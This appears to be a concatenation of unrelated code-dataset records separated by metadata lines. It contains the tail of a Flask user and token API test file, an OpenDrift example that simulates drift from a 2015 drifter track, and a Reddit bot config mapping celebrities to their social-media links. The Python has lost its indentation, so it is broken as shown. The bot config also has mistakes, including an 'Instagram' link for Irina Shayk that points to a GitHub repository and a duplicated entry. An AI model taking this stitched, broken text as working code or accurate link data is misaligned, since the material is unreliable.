assert verify_password('blah', 'blah') is False
assert verify_password('12345') is False
assert verify_password() is False
# test token as parameter
uri = "/api/v1/users?token={}".format(token.decode('utf-8'))
with app.test_request_context(uri):
assert verify_password() is True
def test_get_auth_token(test_client, user):
uri = '/api/v1/token'
headers = auth_headers(user.username, 'password')
resp = test_client.get(uri, headers=headers, follow_redirects=True)
data = json.loads(resp.data.decode('utf-8'))
assert 'token' in data
def test_validate_token(user, app):
token = user.generate_auth_token()
with app.test_request_context():
resp = validate_token(token)
data = json.loads(resp.data.decode('utf-8'))
assert 'is_valid' in data
assert data.get('is_valid') is True
class TestUserAPI:
def create_user(self, test_client, user, new_user,
auth_password='password', password='password'):
uri = '/api/v1/users/'
headers = auth_headers(user.username, auth_password)
resp = test_client.post(uri,
query_string=dict(username=new_user.username,
password=password,
email=new_user.email),
headers=headers,
follow_redirects=True)
return resp
def get_user(self, test_client, username, auth_username='foo',
auth_password='password'):
uri = '/api/v1/users/%s' % username
headers = auth_headers(auth_username, auth_password)
resp = test_client.get(uri, headers=headers, follow_redirects=True)
return resp
def test_getting_a_user(self, test_client, user):
resp = self.get_user(test_client, user.username)
assert resp.status_code == 200
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == user.email
assert data['username'] == user.username
assert data['id'] == user.id
def test_getting_users(self, test_client, users):
uri = '/api/v1/users/'
headers = auth_headers(users[0].username, 'password')
resp = test_client.get(uri, headers=headers, follow_redirects=True)
assert resp.status_code == 200
data = json.loads(resp.data.decode('utf-8'))
assert len(data) == len(users)
for i, user in enumerate(data):
assert data[i]['email'] == users[i].email
assert data[i]['username'] == users[i].username
assert data[i]['id'] == users[i].id
def test_creating_a_user(self, test_client, user):
new_user = User(username='new',
email='new@gmail.com')
new_password = 'password'
uri = '/api/v1/users/'
headers = auth_headers(user.username, new_password)
resp = test_client.post(uri,
query_string=dict(username=new_user.username,
password=new_password,
email=new_user.email),
headers=headers,
follow_redirects=True)
assert resp.status_code == 201
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == new_user.email
assert data['username'] == new_user.username
def test_updating_a_user(self, test_client, user):
username = 'new' # created from previous test
uri = '/api/v1/users/%s' % username
headers = auth_headers(user.username, 'password')
new_username = 'updated'
new_email = 'updated@gmail.com'
new_password = 'new_password'
resp = test_client.put(uri,
query_string=dict(new_username=new_username,
new_email=new_email,
new_password=new_password),
headers=headers, follow_redirects=True)
assert resp.status_code == 200
resp = self.get_user(test_client, new_username)
data = json.loads(resp.data.decode('utf-8'))
assert data['email'] == new_email
assert data['username'] == new_username
def test_deleting_a_user(self, test_client, user):
username = 'updated' # from previous test
uri = '/api/v1/users/%s' % username
headers = auth_headers(user.username, 'password')
# delete the user
resp = test_client.delete(uri, headers=headers)
assert resp.status_code == 200
# test that the user is actually deleted
resp = self.get_user(test_client, username)
assert resp.status_code == 404
|
mit
| 2,100,060,883,032,430,600
| 36.18
| 91
| 0.57002
| false
| 4.082723
| true
| false
| false
|
OpenDrift/opendrift
|
examples/example_current_from_drifter.py
|
1
|
3114
|
#!/usr/bin/env python
"""
Current from drifter
====================
"""
from datetime import datetime, timedelta
from opendrift.readers import reader_current_from_drifter
from opendrift.models.oceandrift import OceanDrift
o = OceanDrift(loglevel=20)
o.set_config('environment:fallback:land_binary_mask', 0)
#%%
# We make a reader which reconstructs the ocean current from
# observed time series of a drifter
# This is actual data of SLDMB/Code drifter as used in this study:
# Jones, C.E., Dagestad, K.-F., Breivik, O., Holt, B., Rohrs, J., Christensen, K.H., Espeseth, M.M., Brekke, C., Skrunes, S. (2016): Measurement and modeling of oil slick transport. Journal of Geophysical Research - Oceans, Volume 121, Issue 10, October 2016, Pages 7759-7775. DOI: 10.1002/2016JC012113.
drifterlons = [2.407376, 2.405140, 2.403248, 2.401872, 2.400152, 2.398518, 2.397056, 2.395766, 2.394476, 2.393358, 2.392584, 2.391810, 2.390606, 2.389316, 2.388628, 2.388370, 2.387940, 2.387510, 2.387338, 2.387166, 2.387252, 2.387338, 2.387682, 2.387854, 2.388284, 2.388628, 2.389230, 2.390004, 2.390434, 2.390692, 2.391380, 2.391896, 2.392068, 2.392154, 2.392068, 2.391896, 2.391896, 2.391896, 2.391638, 2.391380, 2.391208, 2.391036, 2.390692, 2.390090, 2.389660, 2.389058, 2.388628]
drifterlats = [60.034740, 60.033880, 60.033106, 60.032246, 60.031300, 60.030182, 60.028892, 60.027602, 60.026656, 60.025538, 60.024420, 60.023388, 60.022442, 60.021496, 60.020378, 60.019346, 60.018572, 60.017626, 60.016852, 60.016164, 60.015734, 60.015304, 60.014616, 60.014100, 60.013670, 60.013412, 60.013240, 60.013068, 60.013154, 60.013412, 60.013584, 60.013842, 60.014186, 60.014616, 60.015218, 60.015820, 60.016594, 60.017454, 60.018400, 60.019346, 60.020464, 60.021410, 60.022442, 60.023474, 60.024678, 60.025882, 60.026914]
drifterlats = drifterlats[::-1]
drifterlons = drifterlons[::-1]
driftertimes = [datetime(2015, 6, 10, 5, 50) +
timedelta(minutes=10)*i for i in range(len(drifterlons))]
r = reader_current_from_drifter.Reader(
lons=drifterlons, lats=drifterlats, times=driftertimes)
o.add_reader(r)
#%%
# We seed elements within polygon, as could have been extracted
# from remote sensing imagery
lons = [2.39, 2.391, 2.392, 2.393, 2.394, 2.393, 2.392, 2.391, 2.39]
lats = [60.02, 60.02, 60.019, 60.02, 60.021, 60.022, 60.021, 60.021, 60.02]
o.seed_within_polygon(lons=lons, lats=lats,
number=2000, time=r.start_time)
#%%
# Finally running simulation
o.run(end_time=r.end_time, time_step=r.time_step)
o.animation(buffer=.01, fast=True, drifter={'time': driftertimes, 'lon': drifterlons, 'lat': drifterlats,
'label': 'CODE Drifter', 'color': 'b', 'linewidth': 2, 'markersize': 40})
#%%
# .. image:: /gallery/animations/example_current_from_drifter_0.gif
#%%
# Drifter track is shown in red, and simulated trajectories are shown in gray. Oil spill is displaced relative to drifter, but drifter current is assumed to be spatially homogeneous.
o.plot(buffer=.01, fast=True, trajectory_dict={
'lon': drifterlons, 'lat': drifterlats,
'time': driftertimes, 'linestyle': 'r-'})
|
gpl-2.0
| -4,592,492,746,717,793,300
| 55.618182
| 531
| 0.703597
| false
| 2.402778
| false
| false
| false
|
DrewsephA/Celeb_Username_Bot
|
config.py
|
1
|
48634
|
''' ---------------------------------------------------------------------------------------------------------------- '''
''' These below are the membership groups and their membership customized replies. Edit this area to expand the bot. '''
''' ---------------------------------------------------------------------------------------------------------------- '''
SelenaGomez = ("selena", "gomez") #Will trigger if these two words BOTH are in the title.
SelenaGomezReply = """
[Instagram](https://instagram.com/SelenaGomez/)\n
[Twitter](https://twitter.com/SelenaGomez)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlexisRen = ("alexis", "ren") #Every ("firstname", "nickname", "lastname") in the ()'s below must be lower case.
AlexisRenReply = """
[Instagram](https://instagram.com/alexisren)\n
[Twitter](https://twitter.com/alexisreng)\n
[Tumblr](http://alexisreneg.tumblr.com)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorSwift = ("taylor", "swift")
TaylorSwiftReply = """
[Instagram](https://instagram.com/taylorswift)\n
[Twitter](https://twitter.com/Taylorswift13)\n
[Facebook](https://www.facebook.com/TaylorSwift)\n
[Website](http://www.taylorswift.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
McKaylaMaroney = ("mckayla", "maroney")
McKaylaMaroneyReply = """
[Instagram](https://instagram.com/McKaylaMaroney)\n
[Twitter](https://twitter.com/mckaylamaroney)\n
[YouTube Channel](https://www.youtube.com/channel/UC0HJyx19LKRmuHxfiqp9E8w)\n
[Keek](https://www.keek.com/profile/McKaylaMaroney)\n
[Vine](https://vine.co/u/920773070459904000)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SarahHyland = ("sarah", "hyland")
SarahHylandReply = """
[Instagram](https://instagram.com/therealsarahhyland)\n
[Twitter](https://twitter.com/sarah_hyland)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ArielWinter = ("ariel", "winter")
ArielWinterReply = """
[Instagram](https://instagram.com/arielwinter)\n
[Twitter](https://twitter.com/arielwinter1)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarlieKloss = ("karlie", "kloss")
KarlieKlossReply = """
[Instagram](https://instagram.com/karliekloss/)\n
[Twitter](https://twitter.com/karliekloss/)\n
[YouTube](https://www.youtube.com/c/karliekloss)\n
[Facebook](https://www.facebook.com/KarlieKloss)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KendallJenner = ("kendall", "jenner")
KendallJennerReply = """
[Instagram](https://instagram.com/kendalljenner)\n
[Twitter](https://twitter.com/kendalljenner)\n
[Kendall + Kylie^TM](https://instagram.com/kendallandkylie/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KylieJenner = ("kylie", "jenner")
KylieJennerReply = """
Snapchat: KylizzleMyNizzl
[Instagram](https://instagram.com/kyliejenner)\n
[Twitter](https://twitter.com/kyliejenner)\n
[Kendall + Kylie^TM](https://instagram.com/kendallandkylie/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ChloeBennet = ("chloe", "bennet")
ChloeBennetReply = """
[Instagram](https://instagram.com/chloebennet4/)\n
[Twitter](https://twitter.com/ChloeBennet4)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HayleyAtwell = ("hayley", "atwell")
HayleyAtwellReply = """
[Instagram](https://instagram.com/realhayleyatwell)\n
[Twitter](https://twitter.com/HayleyAtwell)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AnnaKendrick = ("anna", "kendrick")
AnnaKendrickReply = """
[Instagram](https://instagram.com/annakendrick47/)\n
[Twitter](https://twitter.com/annakendrick47)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DaniThorne = ("dani", "thorne")
DaniThorneReply = """
[Instagram](https://instagram.com/dani_thorne/)\n
[Twitter](https://twitter.com/Dani_Thorne)\n
[Tumblr](http://danithornesworld.com/)\n
[Youtube](https://www.youtube.com/user/danithornesworld)\n
[IMDb](http://www.imdb.com/name/nm2374574/)\n
[Facebook](https://www.facebook.com/official.danimthorne)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BellaThorne = ("bella", "thorne")
BellaThorneReply = """
[Instagram](https://instagram.com/bellathorne)\n
[Twitter](https://twitter.com/BELLATHORNE)\n
[IMDb](http://www.imdb.com/name/nm2254074/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmiliaClarke = ("emilia", "clarke")
EmiliaClarkeReply = """
[Instagram](https://instagram.com/emilia_clarke/)\n
[Twitter](https://twitter.com/Emilia_Clarke)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JessicaBiel = ("jessica", "biel")
JessicaBielReply = """
[Instagram](https://instagram.com/jessicabiel)\n
[Twitter](https://twitter.com/JessicaBiel)\n
[WhoSay](http://www.whosay.com/jessicabiel)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AshleyBenson = ("ashley", "benson")
AshleyBensonReply = """
[Instagram](https://instagram.com/itsashbenzo)\n
[Twitter](https://twitter.com/AshBenzo)\n
[Website](http://ashleybenson.net/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MelissaBenoist = ("melissa", "benoist")
MelissaBenoistReply = """
[Instagram](https://instagram.com/melissabenoist/)\n
[Twitter](https://twitter.com/MelissaBenoist)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MilanaVayntrub = ("milana", "vayntrub")
MilanaVayntrubReply = """
[Instagram](https://instagram.com/mintmilana)\n
[Twitter](https://twitter.com/MintMilana)\n
[YouTube: Live Prude Girls](https://www.youtube.com/user/LivePrudeGirls)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HeidiKlum = ("heidi", "klum")
HeidiKlumReply = """
[Instagram](https://instagram.com/HeidiKlum)\n
[Twitter](https://twitter.com/heidiklum/)\n
[Website](http://www.heidiklum.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
StanaKatic = ("stana", "katic")
StanaKaticReply = """
[Instagram](https://instagram.com/drstanakatic)\n
[Twitter](https://twitter.com/stana_katic)\n
[Website](http://www.stanakatic.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BlakeLively = ("blake", "lively")
BlakeLivelyReply = """
[Instagram](https://instagram.com/blakelively/)\n
[Twitter](https://twitter.com/blakelively)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MelissaDebling = ("melissa", "debling")
MelissaDeblingReply = """
[Instagram](https://instagram.com/melissadebling/)\n
[Twitter](https://www.twitter.com/MelissaDebling)\n
[Website](http://melissad.co.uk/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SarahShahi = ("sarah", "shahi")
SarahShahiReply = """
[Instagram](https://instagram.com/theonlysarahshahi/)\n
[Twitter](https://twitter.com/onlysarahshahi)\n
[WhoSay](http://www.whosay.com/sarahshahi)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
IrinaShayk = ("irina", "shayk")
IrinaShaykReply = """
[Instagram](https://github.com/DrewsephA/Celeb_Username_Bot)\n
[Twitter](https://twitter.com/theirishayk/)\n
[Facebook](https://www.facebook.com/IrinaShayk)\n
[Website](http://irinashaykofficial.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MarinaNery = ("marina", "nery")
MarinaNeryReply = """
[Instagram](https://instagram.com/marinadnery/)\n
[Twitter](https://twitter.com/marinadnery)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SandraRadav = ("sandra", "radav")
SandraRadavReply = """
[Instagram](https://instagram.com/sandraradav)\n
[Twitter](https://twitter.com/SandraRadav)\n
[YouTube channel](https://www.youtube.com/user/TheLovezumba)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
VanessaHudgens = ("vanessa", "hudgens")
VanessaHudgensReply = """
[Instagram](https://instagram.com/vanessahudgens)\n
[Twitter](https://twitter.com/vanessahudgens)\n
[Tumblr](http://vanessahudgens.tumblr.com/)\n
[YouTube channel](https://www.youtube.com/vanessahudgens)\n
[Facebook](https://www.facebook.com/VanessaHudgens)\n
[Pinterest](https://www.pinterest.com/vanessahudgens/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KellyBrook = ("kelly", "brook")
KellyBrookReply = """
[Instagram](https://instagram.com/iamkb)\n
[Twitter](https://twitter.com/IAMKELLYBROOK)\n
[YouTube channel](https://www.youtube.com/user/kellybrookofficial)\n
[Facebook](https://www.facebook.com/kellybrookofficial)\n
[Website](http://kellybrook.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MandyMoore = ("mandy", "moore")
MandyMooreReply = """
[Instagram](https://instagram.com/mandymooremm/)\n
[Twitter](https://twitter.com/TheMandyMoore)\n
[Facebook](https://www.facebook.com/mandymooreofficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AnnaFaith = ("anna", "faith")
AnnaFaithReply = """
Snapchat: AnnaFaithBae \n
[Instagram](https://instagram.com/annafaithxoxo/)\n
[Twitter](https://twitter.com/TheAnnaFaith)\n
[YouTube channel](https://www.youtube.com/channel/UCTcBaZEehmQeydOl1LTM_5Q/)\n
^Frost ^Sisters ^[instagram](https://instagram.com/frostsisters/) ^& ^[twitter](https://twitter.com/frostsisters)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LexieGrace = ("lexie", "grace")
LexieGraceReply = """
[Instagram](https://instagram.com/Lexiegracelove/)\n
[Twitter](https://twitter.com/lexiegracelove)\n
^Frost ^Sisters ^[instagram](https://instagram.com/frostsisters/) ^& ^[twitter](https://twitter.com/frostsisters)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
FrostSisters = ("frost", "sisters")
FrostSistersReply = """
[Instagram](https://instagram.com/frostsisters/)\n
[Twitter](https://twitter.com/frostsisters)\n
\n-\n
**Anna Faith** \n
Snapchat: AnnaFaithBae \n
[Instagram](https://instagram.com/annafaithxoxo/)\n
[Twitter](https://twitter.com/TheAnnaFaith)\n
[YouTube channel](https://www.youtube.com/channel/UCTcBaZEehmQeydOl1LTM_5Q/)\n
\n-\n
**Lexie Grace**\n
[Instagram](https://instagram.com/Lexiegracelove/)\n
[Twitter](https://twitter.com/lexiegracelove)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorHannum = ("taylor", "hannum")
TaylorHannumReply = """
[Instagram](https://instagram.com/taylorhannum_)\n
[Twitter](https://twitter.com/TaylorHannum)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CaraDelevingne = ("cara", "delevingne")
CaraDelevingneReply = """
[Instagram](https://instagram.com/caradelevingne/)\n
[Twitter](https://twitter.com/Caradelevingne)\n
[Tumblr](http://iamcaradelevingne.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LenaGercke = ("lena", "gercke")
LenaGerckeReply = """
[Instagram](https://instagram.com/lenagercke/)\n
[Facebook](https://www.facebook.com/pages/Lena-Gercke/439297919435120)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JenniferMorrison = ("jen", "jennifer", "jenny", "morrison")
JenniferMorrisonReply = """
[Instagram](https://instagram.com/jenmorrisonlive/)\n
[Twitter](https://twitter.com/jenmorrisonlive/)\n
[Facebook](https://www.facebook.com/JenniferMorrisonOfficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MargotRobbie = ("margot", "robbie")
MargotRobbieReply = """
[Instagram](https://instagram.com/margotrobbieofficial)\n
[Twitter](https://twitter.com/MargotRobbie)\n
[Website](http://www.margotrobbie.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlyssaArce = ("alyssa", "arce")
AlyssaArceReply = """
[Instagram](https://instagram.com/miss_alyssaarce/)\n
[Twitter](https://twitter.com/missalyssaarce)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MirandaKerr = ("miranda", "kerr")
MirandaKerrReply = """
[Instagram](https://instagram.com/mirandakerr/)\n
[Twitter](https://twitter.com/mirandakerr)\n
[Facebook](https://www.facebook.com/MirandaKerr)\n
[Website](http://www.mirandakerr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarlieKloss = ("karlie", "kloss")
KarlieKlossReply = """
[Instagram](https://instagram.com/karliekloss/)\n
[Twitter](https://twitter.com/karliekloss/)\n
[YouTube channel: Klossy](https://www.youtube.com/c/karliekloss)\n
[Facebook](https://www.facebook.com/KarlieKloss)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElsaHosk = ("elsa", "hosk")
ElsaHoskReply = """
[Instagram](https://instagram.com/hoskelsa/)\n
[Twitter](https://twitter.com/elsahosk)\n
[Facebook](https://www.facebook.com/hoskelsa)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CandiceSwanepoel = ("candice", "swanepoel")
CandiceSwanepoelReply = """
[Instagram](https://instagram.com/angelcandices)\n
[Twitter](https://twitter.com/angelcandice/)\n
[Facebook](https://www.facebook.com/angelcandices)\n
[Website](http://www.candiceswanepoel.com/home.php)\n
[Pinterest](https://www.pinterest.com/angelcandice/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MeganFox = ("megan", "fox")
MeganFoxReply = """
[Instagram](https://instagram.com/the_native_tiger/)\n
[Twitter](https://twitter.com/meganfox)\n
[Facebook](https://www.facebook.com/MeganFox)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
IzzyMarshall = ("izzy", "marshall")
IzzyMarshallReply = """
[Instagram](https://instagram.com/_izzymarshall/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ArianaGrande = ("ariana", "grande")
ArianaGrandeReply = """
Snapchat: moonlightbae
[Instagram](https://instagram.com/arianagrande)\n
[Twitter](https://twitter.com/arianagrande)\n
[YouTube channel(personal)](https://www.youtube.com/user/osnapitzari)\n
[Facebook](https://www.facebook.com/arianagrande)\n
[YouTubeVEVO](https://www.youtube.com/user/ArianaGrandeVevo)\n
